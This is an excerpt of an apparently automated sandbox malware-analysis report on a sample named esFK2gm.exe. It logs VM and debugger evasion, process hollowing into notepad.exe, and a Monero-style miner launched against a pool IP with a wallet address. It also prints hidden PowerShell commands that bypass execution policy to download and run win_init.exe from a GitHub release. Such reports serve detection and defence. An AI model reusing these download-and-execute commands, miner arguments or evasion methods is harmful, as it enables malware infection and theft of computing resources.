                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\win_init.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\win_init.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                          Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX

                          Malware Analysis System Evasion

                          barindex
                          Query firmware table information (likely to detect VMs)
                          Source: C:\Windows\System32\notepad.exeSystem information queried: FirmwareTableInformationJump to behavior
                          Source: C:\Windows\System32\svchost.exeFile opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 592831
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 592643
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 592453
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 592159
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 591956
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 591831
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 591706
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 591581
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 591467
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 591360
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 591222
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 591097
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 590972
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 590856
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5363Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4458Jump to behavior
                          Source: C:\Windows\System32\conhost.exeWindow / User API: threadDelayed 401Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9560Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9691
                          Source: C:\Windows\System32\conhost.exeWindow / User API: threadDelayed 397Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7154
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 935
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5608Thread sleep time: -14757395258967632s >= -30000sJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6936Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1016Thread sleep count: 9560 > 30Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3688Thread sleep time: -15679732462653109s >= -30000sJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5416Thread sleep count: 190 > 30Jump to behavior
                          Source: C:\Windows\System32\svchost.exe TID: 5388Thread sleep time: -30000s >= -30000sJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5908Thread sleep count: 9691 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5520Thread sleep time: -22136092888451448s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4048Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5520Thread sleep time: -592831s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5520Thread sleep time: -592643s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5520Thread sleep time: -592453s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5520Thread sleep time: -592159s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5520Thread sleep time: -591956s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5520Thread sleep time: -591831s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5520Thread sleep time: -591706s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5520Thread sleep time: -591581s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5520Thread sleep time: -591467s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5520Thread sleep time: -591360s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5520Thread sleep time: -591222s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5520Thread sleep time: -591097s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5520Thread sleep time: -590972s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5520Thread sleep time: -590856s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6992Thread sleep time: -16602069666338586s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 944Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\Windows\System32 FullSizeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 592831
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 592643
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 592453
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 592159
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 591956
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 591831
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 591706
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 591581
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 591467
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 591360
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 591222
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 591097
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 590972
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 590856
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                          Source: svchost.exe, 0000001C.00000002.2128335034.00000190B6213000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \Device\HarddiskVolume1\??\Volume{ad6cc5d8-f1a9-4873-be33-91b2f05e9306}\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
                          Source: svchost.exe, 0000001C.00000002.2128721217.00000190B6264000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                          Source: svchost.exe, 0000001C.00000002.2128574647.00000190B624B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                          Source: svchost.exe, 0000001C.00000002.2128574647.00000190B624B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                          Source: notepad.exe, 00000002.00000002.2128850608.000001C007B77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.2129985206.000001D63422F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.2131963776.000001D639854000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                          Source: svchost.exe, 0000001C.00000002.2128411466.00000190B622B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                          Source: powershell.exe, 00000010.00000002.1575190410.000002239F320000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW2011%SystemRoot%\system32\mswsock.dll
                          Source: svchost.exe, 0000001C.00000002.2128206897.00000190B6202000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
                          Source: svchost.exe, 0000001C.00000002.2128721217.00000190B6264000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
                          Source: powershell.exe, 00000005.00000002.1370357211.000001BF3C508000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll)
                          Source: svchost.exe, 0000001C.00000002.2128721217.00000190B6264000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .@SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                          Source: svchost.exe, 0000001C.00000002.2128411466.00000190B622B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                          Source: svchost.exe, 0000001C.00000002.2128876995.00000190B628C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                          Source: svchost.exe, 0000001C.00000002.2128574647.00000190B624B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                          Source: win_init.exe, 00000021.00000002.1805850040.00000277C9DDB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                          Source: esFK2gm.exe, 00000000.00000002.2137652124.0000017C510DC000.00000004.00000020.00020000.00000000.sdmp, win_init.exe, 0000001E.00000002.1621864850.000001B6AE1CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll99
                          Source: C:\Users\user\Desktop\esFK2gm.exeProcess information queried: ProcessInformationJump to behavior
                          Source: C:\Windows\System32\sppsvc.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Windows\System32\sppsvc.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Windows\System32\sppsvc.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Windows\System32\tasklist.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Windows\System32\tasklist.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
                          Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
                          Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
                          Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug

                          HIPS / PFW / Operating System Protection Evasion

                          barindex
                          System process connects to network (likely due to code injection or exploit)
                          Source: C:\Windows\System32\notepad.exeNetwork Connect: 45.144.212.77 3333Jump to behavior
                          Allocates memory in foreign processes
                          Source: C:\Users\user\Desktop\esFK2gm.exeMemory allocated: C:\Windows\System32\notepad.exe base: 7FF786570000 protect: page execute and read and writeJump to behavior
                          Bypasses PowerShell execution policy
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://github.com/letzchipman7/fallen/releases/download/v1.0.0/win_init.exe' -OutFile 'C:\Users\user\AppData\Roaming\win_init.exe'"
                          Injects a PE file into a foreign processes
                          Source: C:\Users\user\Desktop\esFK2gm.exeMemory written: C:\Windows\System32\notepad.exe base: 7FF786570000 value starts with: 4D5AJump to behavior
                          Modifies the context of a thread in another process (thread injection)
                          Source: C:\Users\user\Desktop\esFK2gm.exeThread register set: target process: 7076Jump to behavior
                          Sample uses process hollowing technique
                          Source: C:\Users\user\Desktop\esFK2gm.exeSection unmapped: C:\Windows\System32\notepad.exe base address: 7FF786570000Jump to behavior
                          Writes to foreign memory regions
                          Source: C:\Users\user\Desktop\esFK2gm.exeMemory written: C:\Windows\System32\notepad.exe base: 7FF786570000Jump to behavior
                          Source: C:\Users\user\Desktop\esFK2gm.exeMemory written: C:\Windows\System32\notepad.exe base: 7FF786571000Jump to behavior
                          Source: C:\Users\user\Desktop\esFK2gm.exeMemory written: C:\Windows\System32\notepad.exe base: 7FF78699C000Jump to behavior
                          Source: C:\Users\user\Desktop\esFK2gm.exeMemory written: C:\Windows\System32\notepad.exe base: 7FF786B41000Jump to behavior
                          Source: C:\Users\user\Desktop\esFK2gm.exeMemory written: C:\Windows\System32\notepad.exe base: 7FF786DF1000Jump to behavior
                          Source: C:\Users\user\Desktop\esFK2gm.exeMemory written: C:\Windows\System32\notepad.exe base: 7FF786E1C000Jump to behavior
                          Source: C:\Users\user\Desktop\esFK2gm.exeMemory written: C:\Windows\System32\notepad.exe base: 7FF786E1D000Jump to behavior
                          Source: C:\Users\user\Desktop\esFK2gm.exeMemory written: C:\Windows\System32\notepad.exe base: 7FF786E20000Jump to behavior
                          Source: C:\Users\user\Desktop\esFK2gm.exeMemory written: C:\Windows\System32\notepad.exe base: 7FF786E22000Jump to behavior
                          Source: C:\Users\user\Desktop\esFK2gm.exeMemory written: C:\Windows\System32\notepad.exe base: 7FF786E28000Jump to behavior
                          Source: C:\Users\user\Desktop\esFK2gm.exeMemory written: C:\Windows\System32\notepad.exe base: 2EE6A6A010Jump to behavior
                          Source: C:\Users\user\Desktop\esFK2gm.exeProcess created: C:\Windows\System32\notepad.exe --donate-level 2 -o 45.144.212.77:3333 -u 494k9WqKJKFGDoD9MfnAcjEDcrHMmMNJTUun8rYFRYyPHyoHMJf5sesH79UoM8VfoGYevyzthG86r5BTGYZxmhENTzKajL3 -k -p x --cpu-max-threads-hint=25Jump to behavior
                          Source: C:\Users\user\Desktop\esFK2gm.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "PID eq 7076"Jump to behavior
                          Source: C:\Users\user\Desktop\esFK2gm.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "PID eq 7076"Jump to behavior
                          Source: C:\Users\user\Desktop\esFK2gm.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "PID eq 7076"Jump to behavior
                          Source: C:\Users\user\Desktop\esFK2gm.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "PID eq 7076"Jump to behavior
                          Source: C:\Users\user\Desktop\esFK2gm.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "PID eq 7076"Jump to behavior
                          Source: C:\Users\user\Desktop\esFK2gm.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "PID eq 7076"Jump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://github.com/letzchipman7/fallen/releases/download/v1.0.0/win_init.exe' -OutFile 'C:\Users\user\AppData\Roaming\win_init.exe'"Jump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Start-Sleep -s 30; Start-Process 'C:\Users\user\AppData\Roaming\win_init.exe' -WindowStyle Hidden"Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\win_init.exe "C:\Users\user\AppData\Roaming\win_init.exe" Jump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://github.com/letzchipman7/fallen/releases/download/v1.0.0/win_init.exe' -OutFile 'C:\Users\user\AppData\Roaming\win_init.exe'"
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Start-Sleep -s 30; Start-Process 'C:\Users\user\AppData\Roaming\win_init.exe' -WindowStyle Hidden"
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\win_init.exe "C:\Users\user\AppData\Roaming\win_init.exe"
                          Source: unknownProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c start /min powershell.exe -windowstyle hidden -executionpolicy bypass -command "invoke-webrequest -uri 'https://github.com/letzchipman7/fallen/releases/download/v1.0.0/win_init.exe' -outfile 'c:\users\user\appdata\roaming\win_init.exe'"
                          Source: unknownProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c start /min powershell.exe -windowstyle hidden -executionpolicy bypass -command "invoke-webrequest -uri 'https://github.com/letzchipman7/fallen/releases/download/v1.0.0/win_init.exe' -outfile 'c:\users\user\appdata\roaming\win_init.exe'"
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
